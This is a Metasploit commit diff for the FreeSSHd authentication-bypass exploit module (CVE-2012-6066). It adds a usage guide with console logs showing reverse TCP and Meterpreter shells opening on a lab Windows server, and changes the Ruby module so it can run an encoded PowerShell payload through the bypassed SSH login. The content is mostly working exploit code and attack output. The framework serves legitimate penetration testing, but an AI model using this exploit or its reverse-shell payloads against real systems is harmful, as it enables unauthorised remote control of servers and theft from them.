Land #10977, Add documentation and some enhancement to freesshd_authbypass module

documentation/modules/exploit/windows/ssh/freesshd_authbypass.md

@@ -0,0 +1,92 @@
+## Description
+
+This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
+
+
+## Verification
+
+  1. Start msfconsole
+  2. Do : `use exploit/windows/ssh/freesshd_authbypass`
+  3. Do : `set RHOST [target IP]`
+  4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default)
+  5. Do : `set LHOST [Your IP]`
+  6. Do : `set LPORT [valid port]` (port is `4444` by default)
+  7. Do : `exploit`
+  8. If target is vulnerable, a shell (`meterpreter` by default) should pop
+
+## Example with default payload (windows/meterpreter/reverse_tcp)
+```
+msf > use exploit/windows/ssh/freesshd_authbypass
+msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
+RHOST => 192.168.80.131
+msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
+LHOST => 192.168.80.138
+msf exploit(windows/ssh/freesshd_authbypass) > exploit
+
+[*] Started reverse TCP handler on 192.168.80.138:4444 
+[*] 192.168.80.131:22 - Trying username '4Dgifts'
+[*] 192.168.80.131:22 - Trying username 'EZsetup'
+[*] 192.168.80.131:22 - Trying username 'OutOfBox'
+[*] 192.168.80.131:22 - Trying username 'ROOT'
+[*] Sending stage (179779 bytes) to 192.168.80.131
+[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800
+
+meterpreter > sysinfo
+Computer        : SSH-TEST-SERVER
+OS              : Windows 8.1 (Build 9600).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+
+```
+
+## Example with plain old reverse shell (windows/shell_reverse_tcp)
+```
+msf > use exploit/windows/ssh/freesshd_authbypass
+msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
+RHOST => 192.168.80.131
+msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
+PAYLOAD => windows/shell_reverse_tcp
+msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
+LHOST => 192.168.80.138
+msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
+LPORT => 4444
+msf exploit(windows/ssh/freesshd_authbypass) > exploit
+
+[*] Started reverse TCP handler on 192.168.80.138:4444 
+[*] 192.168.80.131:22 - Trying username '4Dgifts'
+[*] 192.168.80.131:22 - Trying username 'EZsetup'
+[*] 192.168.80.131:22 - Trying username 'OutOfBox'
+[*] 192.168.80.131:22 - Trying username 'ROOT'
+[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800
+
+
+
+C:\Windows\system32>ipconfig
+ipconfig
+
+Windows IP Configuration
+
+
+Ethernet adapter Ethernet0:
+
+   Connection-specific DNS Suffix  . : localdomain
+   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
+   IPv4 Address. . . . . . . . . . . : 192.168.80.131
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 
+
+Tunnel adapter isatap.localdomain:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : localdomain
+
+C:\Windows\system32>hostname
+hostname
+SSH-TEST-SERVER
+
+C:\Windows\system32>
+```

modules/exploits/windows/ssh/freesshd_authbypass.rb

@@ -3,10 +3,13 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'msf/core/exploit/powershell'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
@@ -15,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'           => "Freesshd Authentication Bypass",
         'Description'    => %q{
-            This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
+          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
           authentication. You just need the username (which defaults to root). The exploit
           has been tested with both password and public key authentication.
         },
@@ -24,24 +27,26 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Aris', # Vulnerability discovery and Exploit
             'kcope', # 2012 Exploit
-            'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
+            'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module
+            'Imran E. Dawoodjee <imrandawoodjee[at]infosec@gmail.com> (minor improvements)' # minor improvements
           ],
         'References'     =>
           [
-            [ 'CVE', '2012-6066' ],
-            [ 'OSVDB', '88006' ],
-            [ 'BID', '56785' ],
-            [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2010/Aug/132' ]
+            ['CVE', '2012-6066'],
+            ['OSVDB', '88006'],
+            ['BID', '56785'],
+            ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
+            ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
           ],
         'Platform'       => 'win',
         'Privileged'     => true,
-        'DisclosureDate' => "Aug 11 2010",
-        'Targets' =>
+        'Targets'        =>
           [
-            [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
+            ['PowerShell', {}],
+            ['CmdStager upload', {}]
           ],
-        'DefaultTarget' => 0
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => "Aug 11 2010"
       )
     )
 
@@ -68,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
     if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
       version = banner.split(" ")[1]
-      return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/)
+      return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)
+
       return Exploit::CheckCode::Detected
     end
     Exploit::CheckCode::Safe
@@ -80,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def setup_ssh_options
     {
-      :password        => rand_text_alpha(8),
-      :port            => datastore['RPORT'],
-      :timeout         => 1,
-      :proxies         => datastore['Proxies'],
-      :key_data        => OpenSSL::PKey::RSA.new(2048).to_pem,
-      :auth_methods    => ['publickey'],
-      :verify_host_key => :never
+      password:        rand_text_alpha(8),
+      port:            datastore['RPORT'],
+      timeout:         1,
+      proxies:         datastore['Proxies'],
+      key_data:        OpenSSL::PKey::RSA.new(2048).to_pem,
+      auth_methods:    ['publickey'],
+      verify_host_key: :never
     }
   end
 
@@ -133,19 +139,31 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+    end
+
     options = setup_ssh_options
 
     @connection = nil
 
     each_user do |username|
       next if username.empty?
+
       @connection = do_login(username, options)
       break if @connection
     end
 
     if @connection
-      print_status("Uploading payload, this may take several minutes...")
-      execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
+      case target.name
+      when 'PowerShell'
+        print_status('Executing payload via Powershell...')
+        psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+        @connection.exec!("cmd.exe /c " + psh_command)
+      when 'CmdStager upload'
+        print_status("Uploading payload, this may take several minutes...")
+        execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
+      end
     end
   end
 end